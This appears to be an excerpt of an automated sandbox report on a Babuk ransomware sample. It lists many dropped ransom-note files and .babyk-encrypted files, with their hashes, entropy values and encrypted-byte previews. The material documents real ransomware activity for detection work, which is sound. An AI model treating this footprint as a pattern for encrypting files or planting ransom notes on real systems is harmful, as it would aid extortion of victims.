                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.610768464765994
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlfQIpxpLo+qzZIPBDzPIITxPIpVfqEm0ayt9UxNvEEn:P5pLoVzZIPBHxxgffqPE0vtn
                                                                            MD5:488302E694929ABE6788E8B41473FB8D
                                                                            SHA1:7001B038B1B95099C64E41E77DDCDE891805D891
                                                                            SHA-256:6F7DBD314E276AB7335B5234480353D2CE32825B68FB026038BCAE7B2589EF36
                                                                            SHA-512:662570F6576A958AB17D314AC3D844176868A9B0B66722FF95D13AE8D8ADDBF55962357D12D6F7D211F124BAEAEDE130C19B594386A78B423B8987C4C4BACDBF
                                                                            Malicious:false
                                                                            Preview: .....ddaJ$bw........2......_..i.]..O}......7.@.n<...'..K..)*z..\.+.V:...9\..*.bL...{.u.#..&.....z....y.e02b..C.h...K....:~?`..?....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat.LOG1.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.980505504797296
                                                                            Encrypted:false
                                                                            SSDEEP:192:hWO5bLzI4zpIAM+LIMkBgo/6IpAlF58ahTgqtHrGlnd2+:wubBI7+6BgK2F5vHrGNdl
                                                                            MD5:3F7EE1D4736B2080BFF1D313711490AD
                                                                            SHA1:3D490CBC89C0E97481EEF460BB46124252948690
                                                                            SHA-256:9A32CD28DB36C5F2F26A994E192E22307EEEE76311A92BA8D43B5583C6BC3101
                                                                            SHA-512:B294C3674C618FBA7AC95176B287D48341E0A7F585338F97978A408D4F49EC797D4C7FB715F74E3479961CF9DB13FB673D50750B1C8D893E95B9EEB4D8B76CDA
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat.LOG2.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.529509628727875
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlcBKeTUMxkFTqNhfF71Gs/6E6YtQAdlFb8Abh2fePAt8LUxNvEEn:MBKekY5HtQAPFQAbkfDt8L0vtn
                                                                            MD5:364A53EC2039DACD652143EB6F1D2B13
                                                                            SHA1:83E234CA80A485CD1C14D6347F51C4C04132FF2A
                                                                            SHA-256:219CDE1D662354A116DA468FA2051F63909920D6F16CA8753AA5898D94F7CE13
                                                                            SHA-512:931CB74895084ED51BE3F629683DD69BA1390F715616D7A177798D2178E52D1EDBF941EE5A087837E4426E660CC3AB9A623221A580CEF21822AE30B6C095CAC9
                                                                            Malicious:false
                                                                            Preview: ....&.X............B.....x...l...R..S6L.$.V....n!...PgA.{k,..w..,...y.\P.^.....M.oO..s.........j.8.`....L...L7.R.]..w~..4....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.977098422581456
                                                                            Encrypted:false
                                                                            SSDEEP:96:MO27dQNGjxId8dJebDYfltAy5tEOrVIxQVfe4cbh2bBzM8VeeiEc9aoSp0m4P/tl:IR3gAzAIZIV4jbNDUeMspWP/19xqa
                                                                            MD5:E86321089A28C3F932A254A3F211BFEE
                                                                            SHA1:AE88E9BC951894754A613C6952C7A5DB6F06EEB6
                                                                            SHA-256:88278DA97E02CE35591DAA1EE29696583F4977E1B832A5A8A272C40934FB1EA6
                                                                            SHA-512:6382630177AD68536059B3249ECD8D2D343E5C7076DE5546509E6A325E48EA16E526B5E9928F2FAE0D796EB4DD9E31DBB72AF340140A88FBF7D625F4B06AE16B
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.447614241348031
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlNhtr40ZN4rElaD/+Jj1+28BPNcOLS6gTfAMy8qVXxrl/8LUxNvEEn:9hnQ4lI/yj17QP1sfAMvqRxx0L0vtn
                                                                            MD5:2459D6D721D4D88B6E54FEFF5F4B31DD
                                                                            SHA1:DF2F100FE2822A2241629D5C89B7FF7C82AAB170
                                                                            SHA-256:80447A8DABD8863609CEC971123E94C179D53D4D7C61F6BDBF6907081D79308E
                                                                            SHA-512:1FAC824CF704E76E8C43DEE71DAD9A1644BC65EA893969E5B4F4B742B861AEE7F38FA9315784625EE64212E91EAC8D95ACA138F3721FFDF183092D886A2AE855
                                                                            Malicious:false
                                                                            Preview: ....k..sC.. .m.A$..=..]......o....=.UG.t=@.&5]Z.6[bR...P.j.....N5.%..k0.Bw^.....1.x.#..G.j.....;(..u._...I............p..u........choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.977746253867937
                                                                            Encrypted:false
                                                                            SSDEEP:192:Pfsy/yVUEdUm4bfBiReCEs6OaUyQuLoBLynQKPihN9mTKr:cyn8URfBiRe1dyQGr
                                                                            MD5:AA888B04A8FABEFF9E20E07D5D44E79B
                                                                            SHA1:A6B883E5BF61F3B04423D9303C6A35F20D192E10
                                                                            SHA-256:FFB5DFB548B24AA867BA257FC8DFCB7FBFA21BE86E60DA3156331E8451FFE46D
                                                                            SHA-512:10A95329D8D0A7787F0D17C3EE12779FA696AC0F09326A3DE0EC7432A0150C3F5B1B62B957665E30E7D84B7217CF87BDA50A4240210ADE94D43736558010FB43
                                                                            Malicious:false
                                                                            Preview: .I.{h..r<.W.....lN.,.6.C2...;....u....C....6t....9U.f....y..\h.'.........X=$.....df.....<.{.Q.3...m..H....S.1N+...(3^.....}........O-7f...9.....5!...).,.].m...P.m..Q.jS...}....:E........tD..k.n...T9..."q..'....Q......U.m.Pmz.7.r..&]&.}.`-.8.c........&b.j&..]Ys q_Rgx.....u.....k..7....E3...m.e.d."..L.&$t...r.v.|...b.T........L..9~.uN..T.J..yr......z.....YC...h.....P.Fi.".....0.\ua.!.n.......z...B...C....@/..H..b.\...,M.D..+.....j.....<5[...K..1..-j....fjv...e3...1W...,P..... D.L.....Mh.Ur....&j.........Q...L.....w.....~...6..j.o.]..<..s.2.{....t.*.,.M.X.y.c........fU.-;<IAL...c..... ..F!j..^Z.[..u...2.aJ...6...,.-t..f?rt@.h.j'.\@.......IL.......fF-..&.*7....n....R.h"j.......@.......A./,T.f..0h.J.-.. ..O...y3..?.W..3?...`...Bjx..g..@..s...2....7.V\R.%..tW..n!-q9g.dt"h....l..S ..[...."3....r.q|U....3q.[.?D...h .J%...V..r.8......W.)..].r.-.G....Q.K..y...........X..+....lH`..7*.L.`...>..P..g7...........k.....S.Py...]S.....l.N....NT<.3Es...
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Advertising.Xaml_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Advertising.Xaml_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
